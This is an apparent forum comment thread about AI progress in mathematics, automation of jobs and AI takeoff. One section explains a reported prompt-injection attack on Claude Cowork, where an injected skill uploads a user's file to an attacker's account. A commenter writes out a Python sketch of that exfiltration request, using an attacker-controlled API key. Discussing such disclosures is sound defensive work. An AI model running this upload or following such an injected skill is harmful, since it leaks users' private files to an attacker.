
lol if they can't put the phone down now, then how is AI-generated content specifically optimized to keep people scrolling going to be any better?

I think it's a bit early to tell whether GPT 5.2 has substantially helped research mathematicians, given how recent it is. The models move so fast that even if all previous models were completely useless, I wouldn't be sure this one is. Let's wait a year and see? (it takes time to write papers)

It's helped, but it's not true that mathematicians are scoring major results by just feeding their problems to GPT 5.2 Pro, so the OP's claim that mathematicians are just passing off AI output as their own is silly. Here I'm talking about serious mathematical work, not people posting unattributed AI slop to the arXiv.

I assume OP was mostly joking, but we need to be careful about letting AI companies hype up their admittedly impressive progress at the expense of mathematics. This needs to be discussed responsibly.


And we can train models specifically on math proofs? I think the only difference is that math is bigger...

I actually don't think the reason is that they are easier than other open math problems. I think it's more that they are "elementary" in the sense that the problems usually don't require a huge amount of domain knowledge to state.

The Collatz conjecture can be stated using basic arithmetic, yet LLMs have not been able to solve it.
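
To make "basic arithmetic" concrete, the entire conjecture is that iterating this tiny map always reaches 1 (a minimal Python sketch; the function name is mine):

    # The Collatz map: halve even numbers, send odd n to 3n + 1.
    # The conjecture: every positive integer eventually reaches 1.
    def collatz_steps(n: int) -> int:
        steps = 0
        while n != 1:
            n = n // 2 if n % 2 == 0 else 3 * n + 1
            steps += 1
        return steps

    # e.g. collatz_steps(27) == 111, after climbing as high as 9232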

I agree it's easier than Collatz. I just mean I am not sure it's much easier than many currently open questions which are less famous but need more machinery.

That is also one of the hardest problems.

I'm actually not sure what the right attribution method would be. I'd lean towards a single line in the acknowledgements? Because you might use it at, say, every lemma during brainstorming, but it's not clear the right convention is to thank it at every lemma...

Anecdotally, as a math postdoc, I think GPT 5.2 is qualitatively much stronger than anything else I've used. Its hallucination rate is low enough that my default assumption about any solution is no longer that it's hiding a mistake somewhere. Compare with Gemini 3, whose failure mode when it can't solve something is always to pretend it has a solution by "lying": omitting steps, making up theorems, etc. GPT 5.2 usually fails gracefully, and when it makes a mistake it can more often than not admit it when pointed out.


"Since \(U_{k+1} \subseteq U_k\), the sets \(U_k\) are decreasing and periodic, and their intersection \(U = \bigcap_{k \ge 1} U_k\) has density \(d = \lim_{k \to \infty} d_k \ge \epsilon\)."

Is this enough? Let $U_k$ be the set of integers whose remainder mod $6^n$ is greater than or equal to $2^n$ for all $1 < n < k$. The density of each $U_k$ is more than 1/2, I think, but not that of the intersection (which is empty), right?


Indeed. Your sets are decreasing and periodic, with density always greater than $\prod_{k=1}^{\infty}\bigl(1 - (1/3)^k\bigr) \approx 0.56$, yet their intersection is null.

This would all be a fairly trivial exercise in diagonalization if a lemma like the one Deepseek implies actually existed.

(Edit: the bound I suggested may not be exact at each level, but it is asymptotically the limit of the sequence of densities, so up to some epsilon it demonstrates the desired counterexample.)
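
For what it's worth, a quick numeric sanity check in Python (a sketch, not a proof; I'm reading the construction with $n$ running from 1 to $k$, which is what makes the densities line up with the product above):

    # U_k = { x : x mod 6^n >= 2^n for n = 1..k }, periodic mod 6^k.
    def in_Uk(x: int, k: int) -> bool:
        return all(x % 6**n >= 2**n for n in range(1, k + 1))

    for k in range(1, 7):
        period = 6**k
        density = sum(in_Uk(x, k) for x in range(period)) / period
        print(k, round(density, 4))  # 0.6667, 0.6111, ... towards ~0.56

    # Yet the intersection over all k is empty: for any fixed x,
    # pick n with 2^n > x; then 6^n > x too, so x mod 6^n = x < 2^n.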


I'm probably being kind of stupid, but why does the prompt injection need to POST to Anthropic's servers at all? Does Claude Cowork have some protection against POSTing to arbitrary domains but allow POSTs to Anthropic with an arbitrary API key or something?

The article says that Cowork runs in a VM with limited network access, but the Anthropic endpoint has to be reachable. What they don't do is check that the API calls you make use the same API key as the one the Cowork session was created with.

So the prompt injection adds a "skill" that uses curl to send the file to the attacker, via the attacker's API key and the file upload function.
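
Roughly like this (a sketch in Python rather than curl, and I'm assuming the standard Files API endpoint and headers rather than quoting the article's actual payload):

    import requests

    # Attacker-controlled key: NOT the key the Cowork session was
    # created with. The host is still api.anthropic.com, which the
    # VM's egress rules allow.
    ATTACKER_KEY = "sk-ant-..."  # hypothetical

    with open("confidential.txt", "rb") as f:  # hypothetical target file
        requests.post(
            "https://api.anthropic.com/v1/files",
            headers={
                "x-api-key": ATTACKER_KEY,
                "anthropic-version": "2023-06-01",
                "anthropic-beta": "files-api-2025-04-14",
            },
            files={"file": f},
        )
    # The upload lands in the attacker's account, so the data leaves
    # the sandbox without ever touching a blocked domain.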


Yeah, they mention it in the article: most network connections are restricted, but not connections to Anthropic. To spell out the obvious, that's because Claude needs to talk to its own servers. But here they show you can get it to talk to its own servers while putting documents into another user's account, using a different API key. All in a way that you, as an end user, wouldn't really see while it's happening.

Many people will have to ask themselves this question soon regardless of their actions. I don't understand the critique here.

It's more like just pondering out loud how automating ourselves out of a job, in an economic system that requires us to have a job, is going to pan out for the large majority of people in the coming years.

As someone who has been pondering this very question since 2015, I'm starting to think we have been:

- underestimating how much range humans have in their intelligence and how important it is to productivity.

- overestimating how close LLMs are to replicating that range and underestimating how hard it will be for AI to reach it

- underestimating human capacity to become dissatisfied and invent more work for people to do

- underestimating unmet demand for the work people are doing that LLMs can make orders of magnitude more efficient

I was pretty convinced of the whole "post-scarcity singularity" mindset up until the last year or two... My confidence is low, but I'm now leaning more towards Jevons paradox abounding and a very slow superintelligence takeoff, with more time for the economy to adapt.

The shift in my view has come from spending thousands of hours working with LLMs to code and building applications powered by LLMs, trying to get them to do things and constantly running into their limitations, and noting how the boundary of those limitations has been changing over time (it looks more like an S-curve to me than an exponential takeoff). Also from some recent interviews with leading researchers, and from spending a few hundred hours studying the architecture of the human brain and theories of intelligence.


I think the function of a company is to address the limitations of a single human by distributing a task across different people, stabilized with some bureaucracy. But if we can train models past human scale, at corporation scale, there might be large efficiency gains when the entire corporation can function literally as a single organism instead of coordinating separate entities. I think the impact of this phase of AI will be really big.

Probably not actually Turing complete, right? For one, it isn't infinite, so...
